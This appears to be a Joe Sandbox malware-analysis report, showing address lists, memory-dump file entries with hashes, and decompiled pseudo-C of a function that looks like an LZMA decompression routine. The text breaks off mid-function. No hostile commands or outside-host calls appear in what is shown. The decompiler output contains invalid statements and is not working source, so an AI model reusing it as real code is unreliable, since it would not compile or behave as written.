                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x0040751d
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x00000000
                                                    0x00407390
                                                    0x0040738e
                                                    0x004075c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
